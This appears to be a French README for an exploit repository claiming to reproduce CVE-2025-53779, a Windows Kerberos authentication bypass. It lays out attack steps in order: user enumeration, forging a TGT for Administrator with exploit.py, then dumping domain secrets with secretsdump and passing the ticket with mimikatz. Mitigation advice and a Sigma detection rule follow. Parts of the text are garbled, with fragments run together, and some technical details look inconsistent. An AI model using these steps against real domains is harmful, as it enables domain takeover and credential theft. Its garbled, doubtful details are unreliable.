
Reproduction de cve-2025-53779-kerberos_bypass_reproduction
Score CVSS : 9.8 (Critique)
Statut : Exploitation active dans la nature
Divulgation : Patch Tuesday de Microsoft d'août 2025 (Zero-Day)
CVE-2025-53779 est une vulnérabilité critique de contournement de l'authentification dans l'implémentation du protocole Kerberos de Microsoft Windows. Un attaquant non authentifié peut exploiter cette faille pour contourner entièrement l'authentification Kerberos, en se faisant passer pour n'importe quel utilisateur du domaine — y compris les administrateurs de domaine — sans posséder d'identifiants valides ni de matériel cryptographique.
Microsoft a attribué à cette vulnérabilité un score CVSS de 9.8 (Critique) en raison de sa faible complexité d'attaque, de l'absence de privilèges requis, de l'absence d'interaction utilisateur et du potentiel de compromission totale des systèmes joints au domaine.
La vulnérabilité réside dans le service du centre de distribution de clés Kerberos (KDC) (kdsvc.dll) sur les contrôleurs de domaine Windows. Plus précisément, une erreur de logique de validation dans la routine de vérification du certificat d'attributs de privilèges (PAC) permet à un attaquant de forger un message AS-REQ ou TGS-REQ qui contourne les contrôles d'authentification standard.
kdsvc.dllLe KDC ne parvient pas à valider correctement le champ pac-signature-data de la structure PAC lorsque des indicateurs spécifiques sont définis dans le corps du message Kerberos. En envoyant une AS-REQ spécialement conçue avec un type de données PA-PAC-REQUEST manipulé et une entrée de données d'autorisation forgée, l'attaquant amène le KDC à émettre un ticket d'octroi de ticket (TGT) pour n'importe quel nom de principal d'utilisateur (UPN) sans exiger la clé à long terme correspondante.
L'attaque contourne la pré-authentification (l'indicateur REQUIRES_PRE_AUTH est effectivement ignoré) et saute entièrement la vérification du PAC, permettant au ticket généré de contenir des appartenances à des groupes arbitraires (par exemple, Domain Admins, Enterprise Admins).
Toutes les versions prises en charge de Windows Server sont affectées avant la mise à jour de sécurité d'août 2025 :
Remarque : Les versions client de Windows (Windows 10, Windows 11) ne sont pas affectées car elles n'exécutent pas le service KDC.
impacket installéeexploit.py)pip install impacket pycryptodome
Ou en utilisant le requirements.txt fourni :
pip install -r requirements.txt
Utilisez Nmap pour découvrir les services Kerberos :
nmap -sU -p 88 --script krb5-enum-users <target-ip>
Ou utilisez le balayage Kerberos intégré :
python exploit.py --scan <target-ip>
Si vous ne connaissez pas les utilisateurs du domaine, énumérez-les via le roasting AS-REP Kerberos ou LDAP :
python exploit.py --enum <target-ip> <domain>
Générez un TGT forgé pour un utilisateur cible :
python exploit.py --dc-ip <dc-ip> --domain <domain> --target-user <username>
Exemple :
python exploit.py --dc-ip 192.168.1.10 --domain corp.local --target-user Administrator
L'exploit génère un fichier de ticket au format Kirbi. Utilisez les outils Impacket pour vérifier :
# Export the ticket
set KRB5CCNAME=ticket.kirbi
# Use the ticket to access a resource
python examples/secretsdump.py -k -no-pass <domain>/Administrator@<target>
Une fois un TGT valide obtenu, vous pouvez :
secretsdump.py -k -no-pass domain/Administrator@<dc>mimikatz "kerberos::ptt ticket.kirbi"Le script exploit.py joint implémente le flux d'attaque suivant :
PA-PAC-REQUEST forgé et des données d'autorisation manipuléeskdsvc.dllAttacker Domain Controller (KDC)
| |
| AS-REQ (forged PA-PAC-REQUEST) |
| - cname: Administrator |
| - sname: krbtgt/DOMAIN |
| - padata: PA-PAC-REQUEST + |
| forged auth-data |
|------------------------------------->|
| |
| [Vulnerable Path] |
| 1. KDC receives AS-REQ |
| 2. Checks PA-PAC-REQUEST flag |
| 3. **Bypasses pre-auth check** |
| 4. Skips PAC verification |
| 5. Generates TGT with arbitrary |
| groups via auth-data |
| |
| AS-REP (forged TGT) |
| - Encrypted with krbtgt key |
| - Contains forged PAC |
|<-------------------------------------|
| |
| TGS-REQ (use forged TGT) |
| - Request service ticket |
| - For any service (CIFS, LDAP, |
| HTTP, HOST) |
|------------------------------------->|
| |
| TGS-REP (service ticket) |
| - Legitimate service ticket |
| - Attacker can now access |
| any resource |
|<-------------------------------------|
Appliquez les mises à jour du Patch Tuesday de Microsoft d'août 2025 — Il s'agit du correctif principal. Consultez le tableau des versions affectées ci-dessus pour connaître la KB correspondante.
Surveillez les tentatives d'exploitation :
Segmentation du réseau :
Activez une journalisation supplémentaire :
NetworkProvider\Kerberos\Operational)Règle Sigma (AS-REQ sans pré-authentification) :
title: CVE-2025-53779 Kerberos Authentication Bypass
logsource:
product: windows
service: security
detection:
selection:
EventID: 4768
PreAuthenticationType: 0 # No pre-authentication required
condition: selection
falsepositives:
- Users with "Do not require Kerberos preauthentication" set
Ce dépôt est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'exploitation non autorisée de CVE-2025-53779 contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation écrite explicite de tester est illégale. Les auteurs ne sont pas responsables de toute utilisation abusive de ces informations.
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
| Version de Windows | Affecté | Mise à jour corrective |
|---|
| Windows Server 2025 | ✅ Oui | KB5044289 |
| Windows Server 2022 | ✅ Oui | KB5044285 |
| Windows Server 2019 | ✅ Oui | KB5044277 |
| Windows Server 2016 | ✅ Oui | KB5044293 |
| Windows Server 2012 R2 | ✅ Oui | KB5044297 |
| Windows Server 2012 | ✅ Oui | KB5044291 |
| Windows Server 2008 R2 (ESU) | ✅ Oui | KB5044301 |
| Windows Server 2008 (ESU) | ✅ Oui | KB5044303 |